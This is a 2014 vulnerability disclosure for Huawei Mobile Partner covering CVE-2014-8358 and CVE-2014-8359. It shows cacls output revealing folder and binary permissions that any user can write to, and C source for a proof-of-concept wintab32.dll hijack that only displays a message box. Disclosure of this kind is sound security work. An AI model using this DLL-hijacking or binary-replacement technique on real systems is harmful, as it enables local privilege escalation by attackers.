facebook facebook twitter rss

Huawei Mobile Partner Multiple Vulnerabilities

Author: Osanda Malith Jayathissa , Published: 20-10-2014
# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only
# CVE: CVE-2014-8358, CVE-2014-8359

#1| Local Privilege Escalation - CVE-2014-8358
-----------------------------------------------

- Description
==============
Any user in the system can modify the legitimate binary to any kind of malicious executable.
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker break into a low privilege account he could use
this application to escalate his privileges.

- Proof of Concept
===================

C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
BUILTIN\Users:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F




#2| Dll Hijacking Vulnerability (wintab32.dll) - CVE-2014-8359
---------------------------------------------------------------


#include <windows.h>

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH: owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
}
/*EOF*/

Like us on Facebook :